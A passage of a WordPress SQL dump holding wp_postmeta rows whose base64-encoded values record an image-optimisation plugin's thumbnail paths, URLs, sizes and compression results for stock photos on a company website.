wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzkyLCJpZCI6NzUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Mjc5NCwiaWQiOjc1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI3OTYsImlkIjo3NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNzk5LCJpZCI6NzUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyODAyLCJpZCI6NzUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyODA0LCJpZCI6NzUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyODA3LCJpZCI6NzUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyODA5LCJpZCI6NzUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIxMzA3OTcwMi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMTMwNzk3MDItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjEzMDc5NzAyLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyODEyLCJpZCI6NzUzfV0='); 
INSERT INTO `wp_postmeta` VALUES (30025, 752, 'wpfc_optimisation_reduction', '11846'); 
INSERT INTO `wp_postmeta` VALUES (30026, 752, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYuanBnIiwid2lkdGgiOjUwODAsImhlaWdodCI6MzM4NywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MjgxNywiaWQiOiI3NTIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTE0LCJ0aW1lIjoxNDgzNTgyODIxLCJpZCI6NzUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTE5NywidGltZSI6MTQ4MzU4MjgyNCwiaWQiOjc1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjExMzMsInRpbWUiOjE0ODM1ODI4MjgsImlkIjo3NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjQ1NTQsInRpbWUiOjE0ODM1ODI4MzMsImlkIjo3NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0NjAsInRpbWUiOjE0ODM1ODI4MzYsImlkIjo3NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MTEsInRpbWUiOjE0ODM1ODI4MzksImlkIjo3NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0MDgsInRpbWUiOjE0ODM1ODI4NDIsImlkIjo3NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4NDcsInRpbWUiOjE0ODM1ODI4NDYsImlkIjo3NTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQwMCwidGltZSI6MTQ4MzU4Mjg0OSwiaWQiOjc1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDEzLCJ0aW1lIjoxNDgzNTgyODUzLCJpZCI6NzUyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0NDgsInRpbWUiOjE0ODM1ODI4NTcsImlkIjo3NTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjUxNywidGltZSI6MTQ4MzU4Mjg2MSwiaWQiOjc1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMzk3MjU2MTYtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTM5NzI1NjE2LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEzOTcyNTYxNi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NTQ0LCJ0aW1lIjoxNDgzNTgyODY0LCJpZCI6NzUyfV0='); 
INSERT INTO `wp_postmeta` VALUES (30027, 751, 'wpfc_optimisation_reduction', '13830'); 
INSERT INTO `wp_postmeta` VALUES (30028, 751, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC5qcGciLCJ3aWR0aCI6NDM2OCwiaGVpZ2h0IjoyOTEyLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTgyODY5LCJpZCI6Ijc1MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2ODcsInRpbWUiOjE0ODM1ODI4NzMsImlkIjo3NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NDc3MTQtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg0NzcxNC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNDM4LCJ0aW1lIjoxNDgzNTgyODc3LCJpZCI6NzUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODQ3NzE0LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1d